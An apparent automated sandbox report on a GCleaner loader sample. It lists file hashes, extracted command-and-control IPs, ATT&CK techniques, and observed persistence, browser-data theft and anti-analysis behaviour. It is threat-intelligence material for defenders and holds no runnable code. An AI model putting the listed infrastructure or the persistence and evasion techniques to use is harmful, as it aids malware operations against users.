gcleaner | 906d9e1b735cb0e4f4be5caf05656be681717f430a818902b1894a28f9375bbc

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2023 01:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trainerv_pwba4pl5.exe
Size

3.7MB
MD5

f5ea08bdc47bf84ef2ee53ee85c2d976
SHA1

681925e9a3853a138cc66f4aa09e3f09d6eff7d1
SHA256

906d9e1b735cb0e4f4be5caf05656be681717f430a818902b1894a28f9375bbc
SHA512

4bbdb5af8fdbbf9ae9f014ea9977dcccb32ad10d071196a1b5fa4abdd1c8d9310fdc885ce85692c5f70c098d60dbe43290f3e9a1dcc1f6d759187e35cf17599a
SSDEEP

98304:fGOh3G3ggxc1hbBBPkA567hgci1NaWKoZXkNNxxaYxoDXcW:UwgmhLp67+zDDa3HaA6XcW

Score

10^/10

gcleaner discovery loader persistence spyware stealer upx

Malware Config

Extracted

Family

gcleaner

85.31.45.39

85.31.45.250

85.31.45.251

85.31.45.88

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Downloads MZ/PE file

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nslBB52.tmp\GetVersion.dll	acprotect

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

0OQUu7uBX.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0OQUu7uBX.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0OQUu7uBX.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0OQUu7uBX.exeFileDate49.exewGra.exechrome.exechrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	0OQUu7uBX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	FileDate49.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wGra.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	chrome.exe

Executes dropped EXE 25 IoCs

Processes:

is-15UIA.tmpCR_DBF.exeCR_DBF.exebhi1y.exe0OQUu7uBX.exenynNd5ZQzG6UHaEmad6b.exeis-L2I1N.tmpis-BHD94.tmpFileDate49.execmd.exeErkalo46.exeFLj9ojoBE3.exeT4gizA.exeis-RBHF8.tmpSyncBackupShell.exewGra.exem0R62.exechromedriver.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.execHHeNEL.exe

pid	process
2188	is-15UIA.tmp
2116	CR_DBF.exe
5028	CR_DBF.exe
5504	bhi1y.exe
5532	0OQUu7uBX.exe
5700	nynNd5ZQzG6UHaEmad6b.exe
5716	is-L2I1N.tmp
5900	is-BHD94.tmp
6136	FileDate49.exe
3912	cmd.exe
5276	Erkalo46.exe
5004	FLj9ojoBE3.exe
724	T4gizA.exe
1972	is-RBHF8.tmp
1020	SyncBackupShell.exe
1820	wGra.exe
2064	m0R62.exe
4992	chromedriver.exe
6088	chrome.exe
5788	chrome.exe
5976	chrome.exe
2692	chrome.exe
1556	chrome.exe
6008	chrome.exe
960	cHHeNEL.exe

Loads dropped DLL 64 IoCs

Processes:

is-15UIA.tmpis-L2I1N.tmpis-BHD94.tmpFLj9ojoBE3.exe

pid	process
2188	is-15UIA.tmp
5716	is-L2I1N.tmp
5900	is-BHD94.tmp
5900	is-BHD94.tmp
5900	is-BHD94.tmp
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nslBB52.tmp\GetVersion.dll	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

FLj9ojoBE3.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Windows\CurrentVersion\Run	FLj9ojoBE3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\toc = "C:\\Users\\Admin\\AppData\\Roaming\\toc\\wGra.exe"	FLj9ojoBE3.exe

Checks for any installed AV software in registry 1 TTPs 4 IoCs

Security Software Discovery

T1063

Processes:

CR_DBF.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build	CR_DBF.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	CR_DBF.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	CR_DBF.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	CR_DBF.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

161 api.ipify.org
160 api.ipify.org
Drops file in System32 directory 1 IoCs

Processes:

0OQUu7uBX.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini 0OQUu7uBX.exe

flow	ioc
161	api.ipify.org
160	api.ipify.org

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	0OQUu7uBX.exe

Drops file in Program Files directory 54 IoCs

Processes:

is-15UIA.tmpis-L2I1N.tmpsetup.exeis-RBHF8.tmpSyncBackupShell.exe

description	ioc	process
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-QI1M2.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-5V2LS.tmp	is-L2I1N.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\c78ec6a8-f180-4cbb-817d-ef3b74d982c7.tmp	setup.exe
File created	C:\Program Files (x86)\BWngBackup\is-TUPLO.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\Help\images\is-S0C6P.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-BQJPH.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-6LLRE.tmp	is-L2I1N.tmp
File created	C:\Program Files (x86)\clFlow	SyncBackupShell.exe
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-T2U39.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\is-BM46H.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\is-SAQT1.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-3PIT4.tmp	is-L2I1N.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-A3EAQ.tmp	is-L2I1N.tmp
File opened for modification	C:\Program Files (x86)\BWngBackup\unins000.dat	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\unins000.dat	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\Help\images\is-5DI44.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\is-06Q2S.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\is-G5G0G.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\unins000.dat	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\is-4R7PM.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\unins000.dat	is-L2I1N.tmp
File opened for modification	C:\Program Files (x86)\BWngBackup\SyncBackupShell.exe	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-7IPNO.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\BWngBackup\is-ODJCS.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\Help\images\is-6KRD8.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\is-OEBPS.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\is-NNHQ9.tmp	is-15UIA.tmp
File opened for modification	C:\Program Files (x86)\Erkalo 4.6\unins000.dat	is-L2I1N.tmp
File created	C:\Program Files (x86)\BWngBackup\Help\is-L0QDD.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-01M6U.tmp	is-15UIA.tmp
File opened for modification	C:\Program Files (x86)\CRDBH\RepairDbf.ini	is-15UIA.tmp
File opened for modification	C:\Program Files (x86)\CRDBH\unins000.dat	is-15UIA.tmp
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230410031832.pma	setup.exe
File created	C:\Program Files (x86)\CRDBH\is-KB48B.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\is-CAQIT.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-A8A4F.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\is-RUG6I.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\BWngBackup\Help\is-49S28.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\is-EQP0T.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-KRG7V.tmp	is-L2I1N.tmp
File opened for modification	C:\Program Files (x86)\Erkalo 4.6\Erkalo46.exe	is-L2I1N.tmp
File created	C:\Program Files (x86)\CRDBH\is-3HNQP.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\is-6B0HM.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\is-TH0N9.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\BWngBackup\is-LORMH.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\Help\images\is-9LGFN.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\Demo\Supl\is-0849L.tmp	is-15UIA.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-4KCP0.tmp	is-L2I1N.tmp
File created	C:\Program Files (x86)\Erkalo 4.6\is-C9F9R.tmp	is-L2I1N.tmp
File created	C:\Program Files (x86)\BWngBackup\is-5JC4P.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\is-RU1GH.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\BWngBackup\Languages\is-PB15C.tmp	is-RBHF8.tmp
File created	C:\Program Files (x86)\CRDBH\is-FJRDJ.tmp	is-15UIA.tmp
File opened for modification	C:\Program Files (x86)\CRDBH\CR_DBF.exe	is-15UIA.tmp

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bWSvWqekZvxvfHIhZZ.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\bWSvWqekZvxvfHIhZZ.job	schtasks.exe

Program crash 57 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4828	2116	WerFault.exe	CR_DBF.exe
4780	2116	WerFault.exe	CR_DBF.exe
3464	2116	WerFault.exe	CR_DBF.exe
4184	5028	WerFault.exe	CR_DBF.exe
4392	5028	WerFault.exe	CR_DBF.exe
2800	5028	WerFault.exe	CR_DBF.exe
516	5028	WerFault.exe	CR_DBF.exe
3112	5028	WerFault.exe	CR_DBF.exe
4880	5028	WerFault.exe	CR_DBF.exe
312	5028	WerFault.exe	CR_DBF.exe
4896	5028	WerFault.exe	CR_DBF.exe
4232	5028	WerFault.exe	CR_DBF.exe
4348	5028	WerFault.exe	CR_DBF.exe
2748	5028	WerFault.exe	CR_DBF.exe
4696	5028	WerFault.exe	CR_DBF.exe
3380	5028	WerFault.exe	CR_DBF.exe
3432	5028	WerFault.exe	CR_DBF.exe
4912	5028	WerFault.exe	CR_DBF.exe
368	5028	WerFault.exe	CR_DBF.exe
3516	5028	WerFault.exe	CR_DBF.exe
2408	5028	WerFault.exe	CR_DBF.exe
4552	5028	WerFault.exe	CR_DBF.exe
1336	5028	WerFault.exe	CR_DBF.exe
3936	5028	WerFault.exe	CR_DBF.exe
3536	5028	WerFault.exe	CR_DBF.exe
4480	5028	WerFault.exe	CR_DBF.exe
5016	5028	WerFault.exe	CR_DBF.exe
1336	5028	WerFault.exe	CR_DBF.exe
3536	5028	WerFault.exe	CR_DBF.exe
1068	5028	WerFault.exe	CR_DBF.exe
4752	5028	WerFault.exe	CR_DBF.exe
3804	5028	WerFault.exe	CR_DBF.exe
1508	5028	WerFault.exe	CR_DBF.exe
5152	5028	WerFault.exe	CR_DBF.exe
5368	5028	WerFault.exe	CR_DBF.exe
5524	5028	WerFault.exe	CR_DBF.exe
5732	5028	WerFault.exe	CR_DBF.exe
5244	5028	WerFault.exe	CR_DBF.exe
4788	5028	WerFault.exe	CR_DBF.exe
5632	5028	WerFault.exe	CR_DBF.exe
3816	5028	WerFault.exe	CR_DBF.exe
5404	5028	WerFault.exe	CR_DBF.exe
5660	5028	WerFault.exe	CR_DBF.exe
6000	5028	WerFault.exe	CR_DBF.exe
5840	5028	WerFault.exe	CR_DBF.exe
5528	5028	WerFault.exe	CR_DBF.exe
5132	5028	WerFault.exe	CR_DBF.exe
5072	5028	WerFault.exe	CR_DBF.exe
3308	5028	WerFault.exe	CR_DBF.exe
1164	5028	WerFault.exe	CR_DBF.exe
4012	5028	WerFault.exe	CR_DBF.exe
5824	5028	WerFault.exe	CR_DBF.exe
4968	5028	WerFault.exe	CR_DBF.exe
4496	5028	WerFault.exe	CR_DBF.exe
4732	5028	WerFault.exe	CR_DBF.exe
4416	5028	WerFault.exe	CR_DBF.exe
2360	5028	WerFault.exe	CR_DBF.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\rtmWSP8L\FLj9ojoBE3.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\rtmWSP8L\FLj9ojoBE3.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\rtmWSP8L\FLj9ojoBE3.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\rtmWSP8L\FLj9ojoBE3.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3768 schtasks.exe
6092 schtasks.exe

pid	process
3768	schtasks.exe
6092	schtasks.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe0OQUu7uBX.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	0OQUu7uBX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	0OQUu7uBX.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4116 taskkill.exe

pid	process
4116	taskkill.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

Processes:

CR_DBF.exemsedge.exemsedge.exeidentity_helper.exeFLj9ojoBE3.exepowershell.EXEwGra.exepowershell.exe

pid	process
5028	CR_DBF.exe
5028	CR_DBF.exe
3588	msedge.exe
3588	msedge.exe
5028	CR_DBF.exe
5028	CR_DBF.exe
2152	msedge.exe
2152	msedge.exe
392	identity_helper.exe
392	identity_helper.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5028	CR_DBF.exe
5028	CR_DBF.exe
5024	powershell.EXE
5024	powershell.EXE
5024	powershell.EXE
1820	wGra.exe
1820	wGra.exe
1820	wGra.exe
1820	wGra.exe
1820	wGra.exe
5028	CR_DBF.exe
5028	CR_DBF.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
5004	FLj9ojoBE3.exe
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

2152 msedge.exe
2152 msedge.exe
2152 msedge.exe
2152 msedge.exe
2152 msedge.exe
2152 msedge.exe
2152 msedge.exe
2152 msedge.exe

pid	process
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

taskkill.exepowershell.EXEwGra.exem0R62.exechrome.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4116	taskkill.exe
Token: SeDebugPrivilege	5024	powershell.EXE
Token: SeDebugPrivilege	1820	wGra.exe
Token: SeDebugPrivilege	2064	m0R62.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeShutdownPrivilege	6088	chrome.exe
Token: SeCreatePagefilePrivilege	6088	chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

2152 msedge.exe
2152 msedge.exe
2152 msedge.exe

pid	process
2152	msedge.exe
2152	msedge.exe
2152	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

trainerv_pwba4pl5.exeis-15UIA.tmpnet.exenet.exeCR_DBF.exemsedge.exe

description	pid	process	target process
PID 3832 wrote to memory of 2188	3832	trainerv_pwba4pl5.exe	is-15UIA.tmp
PID 3832 wrote to memory of 2188	3832	trainerv_pwba4pl5.exe	is-15UIA.tmp
PID 3832 wrote to memory of 2188	3832	trainerv_pwba4pl5.exe	is-15UIA.tmp
PID 2188 wrote to memory of 1688	2188	is-15UIA.tmp	net.exe
PID 2188 wrote to memory of 1688	2188	is-15UIA.tmp	net.exe
PID 2188 wrote to memory of 1688	2188	is-15UIA.tmp	net.exe
